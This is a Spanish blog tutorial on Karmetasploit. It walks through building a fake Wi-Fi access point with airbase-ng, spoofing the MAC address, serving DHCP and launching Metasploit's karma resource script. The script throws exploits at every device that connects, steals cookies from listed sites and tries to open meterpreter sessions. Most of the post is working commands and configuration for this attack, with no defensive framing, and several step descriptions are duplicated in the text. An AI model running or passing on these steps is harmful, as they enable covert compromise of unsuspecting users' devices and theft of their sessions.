Karmetasploit
Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.
Descargamos Karmetasploit
Instalamos dhcpd3-server
sudo apt-get install isc-dhcp-server
Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.
Luego procedemos a editar /msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.
Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0.
Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:
Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:
Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red.
Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:
Ahora iniciamos mestasploit con karma.
Al iniciar karmetasploit les aparecerá:
# # Sample configuration file for ISC dhcpd for Debian # # Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as # configuration file instead of this file. # # # The ddns-updates-style parameter controls whether or not the server will # attempt to do a DNS update when a lease is confirmed. We default to the # behavior of the version 2 packages ('none', since DHCP v2 didn't # have support for DDNS.) ddns-update-style none; # option definitions common to all supported networks... option domain-name "10.0.0.1"; option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; # If this DHCP server is the official DHCP server for the local # network, the authoritative directive should be uncommented. #authoritative; # Use this to send dhcp log messages to a different log file (you also # have to hack syslog.conf to complete the redirection). log-facility local7; # No service will be given on this subnet, but declaring it helps the # DHCP server to understand the network topology. #subnet 10.0.0.0 netmask 255.255.255.0 { #} # This is a very basic subnet declaration. #subnet 10.0.0.0 netmask 255.255.255.0 { # range 10.0.0.100 10.0.0.254; # option routers 10.0.0.1; #}
Luego procedemos a editar /msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.
Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0.
airmon-ng start wlan0
Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:
ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:
airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0
Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red.
Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 dhcpd -cf /etc/dhcp/dhcpd.conf at0
Ahora iniciamos mestasploit con karma.
msfconsole -r karma.rc
Al iniciar karmetasploit les aparecerá:
0 comentarios:
Publicar un comentario